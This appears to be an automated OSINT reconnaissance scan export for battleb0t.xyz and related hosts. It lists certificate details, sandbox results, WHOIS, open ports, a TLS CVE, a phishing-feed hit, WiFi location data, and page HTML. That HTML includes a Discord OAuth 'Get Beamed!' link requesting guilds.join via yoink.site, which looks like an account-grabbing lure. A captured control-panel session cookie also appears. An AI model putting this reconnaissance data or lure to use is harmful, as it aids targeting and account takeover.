X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Dec 21 09:03:52.902 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:31:BA:E4:35:B8:DF:14:C3:99:B3:D0:FB:
C6:93:77:5C:5A:D1:E2:7C:62:90:83:BB:77:59:14:17:
00:CD:14:09:02:21:00:A0:89:29:6C:06:8B:80:0E:58:
FD:7C:72:66:63:BF:84:90:99:2F:F3:90:6D:39:BD:86:
6C:21:15:5D:B2:9C:A1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Dec 21 09:03:52.857 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:85:6B:1A:5F:D3:6B:D9:52:36:0B:
44:9B:B7:9C:FF:8D:70:8C:F4:D1:34:69:3C:10:D4:AD:
03:93:DD:F1:A4:02:21:00:C0:7F:F8:B3:01:C9:63:4D:
D3:D5:2B:F6:46:B5:04:38:1F:2D:8A:D9:5F:C8:07:F8:
5D:FA:B6:44:79:49:3C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 3B:53:77:75:3E:2D:B9:80:4E:8B:30:5B:06:FE:40:3B:
67:D8:4F:C3:F4:C7:BD:00:0D:2D:72:6F:E1:FA:D4:17
Timestamp : Dec 21 09:03:52.852 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:87:5E:CF:47:90:E0:B2:0D:AA:FC:5D:
58:AA:C9:7E:AE:76:49:89:1E:EB:25:CD:66:CC:A5:23:
F6:24:7A:AE:07:02:20:5E:32:A3:09:9E:48:84:4A:A9:
3B:C0:AA:53:22:AB:E0:9A:BF:4F:DB:FB:66:C2:2B:F8:
4E:E8:E8:BE:9A:FD:22
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:a8:8f:12:1b:fa:2f:f4:cc:aa:04:9b:b9:ea:
95:f5:30:5a:59:f6:f8:b4:4d:b6:51:7e:89:b3:c8:92:7a:7e:
80:c0:81:be:6e:38:4e:5e:5a:7d:bb:10:72:ae:d7:11:5f:02:
31:00:fc:dd:52:7b:4b:33:ad:13:21:0b:b3:8a:93:5d:fb:03:
ac:f0:f4:f6:55:46:ed:1e:45:14:60:d2:47:04:5f:56:a0:b6:
8d:b8:c7:6a:0b:fd:73:a6:07:2b:fa:b2:e2:49
| 34.148.97.127 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:8443 | 172.67.168.252 |
| 2023-05-12 02:50:11 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://www.rotaryragusa.it/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "rotaryragusa.it"\n "www.rotaryragusa.it"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d28_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_d28_IESQMMUTEX_0_331"\n "IsoScope_d28_ConnHashTable<3368>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_d28_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d28_IE_EarlyTabStart_0x910_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d28_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3368"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar4950.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.rotaryragusa.it" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.rotaryragusa.it" (Indicator: "user-agent: ")\n "GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: rotaryragusa.it\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: rotaryragusa.it\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/js/libs/gumby.min.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/rotary/js/libs/gumby.min.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/css/style.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/rotary/css/style.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.3 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.3 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/style.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/rotary/style.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/js/main.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/rotary/js/main.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/js/jquery/jquery.hoverIntent.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/rotary/js/jquery/jquery.hoverIntent.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/css/bootstrap-image-gallery.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: | 185.199.110.153 |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 0 | 0 | 1 | 0 | None | http://ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:00:36 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abusecomplaints@markmonitor.com | Domain Name: GITHUB.COM
Registry Domain ID: 1264983250_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-09-07T09:10:44Z
Creation Date: 2007-10-09T18:20:50Z
Registry Expiry Date: 2024-10-09T18:20:50Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: DNS1.P08.NSONE.NET
Name Server: DNS2.P08.NSONE.NET
Name Server: DNS3.P08.NSONE.NET
Name Server: DNS4.P08.NSONE.NET
Name Server: NS-1283.AWSDNS-32.ORG
Name Server: NS-1707.AWSDNS-21.CO.UK
Name Server: NS-421.AWSDNS-52.COM
Name Server: NS-520.AWSDNS-01.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Content_Type": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Pragma": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Content_Type": ["text/html; charset=\"utf-8\""], "Set_Cookie": ["whostmgrrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "whostmgrsession=%3a6IuBt4aiK1K5mEWt%2ce37772b57ce45a47eb222a7bbd7feb28; HttpOnly; path=/; port=2086", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2086", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Pragma": ["no-cache"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 02:44:09 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 1 | 0 | None | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io | battleb0t.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | denis (Net ID: 00:01:46:02:C4:4C) | 37.7813933,-122.3918002 |
| 2023-05-12 02:45:35 | Internet Name | No | DNSDumpster | 0 | 0 | 1 | 0 | None | nwapi.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-ray: 7c5f6036feab195d-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:07:25 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 185.199.110.153 |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.64 | 34.74.170.74 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2087 | 104.21.71.14 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [003marek.github.io]
https://www.openphish.com/feed.txt | 003marek.github.io |
| 2023-05-12 03:33:51 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | PLTE$
kyhNlC2D
kShPAJ
esyS_S@?
txkST`ANdNO
rXYuPYXHR
XajGc
dzvRt
IDATx
:7MV-
'@crrX
QK>@W
vWP`Z
tmv1q
XEFi"
4@1hb
a'c:3
2FRB>
LHiiB
YFI6D
.f:9Lsy
PDad6
k67iB
'phZQ
_tJ/o8
qgd0 f
D3f1c
-\-u?V
\e<<N
X?YJa
IDAT<mJ
ISE>E
>O$-'
H T:1
g !A"B
Ff<3Bz\
TQHocI
Dp//>
<U'Xk
V M55j
\T:x
u>6N9z@
IDATB
zt28zQ
NL3:\m
l?:6
_ycqP
t1nT_
o !ABH
FbaS\
d5hR8
sGr`G
hFGxh\
\0.:H
a$QEC
o"5mw
su<<
f33Jt
yNEEt
IDATd
9LGKOA
NwqWx
s<N5xh
dNHEJrV
?B v-zfB
zX 9lkh
0cp/8
Pcwr`
sP:\J>
.H2Dy
InIPC
W$4n_
?S5qq
pRoh_
NsV`L
XHhLy
1B 2"ND
/U.m
__OjA
lcJE!
Hyfoi
Xlyfh/
rFtB6
`hPT/
c B/A
` a>A
Zl>VEY
Yq0Kxq4
Ye-wdW
3s7!B
4`0 V
EwJ/.lsQ
fyB0I0
Y"<XN/h
C 3JE
OLbC1
WhdHn
l:ZLd
Sq4RXv
!4hgr | https://funny.battleb0t.xyz/images/random_6.PNG |
| 2023-05-12 03:18:52 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://funny.battleb0t.xyz/images/withat_1.jpg |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.77): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:16 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | oldfluid.battleb0t.xyz |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.55): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
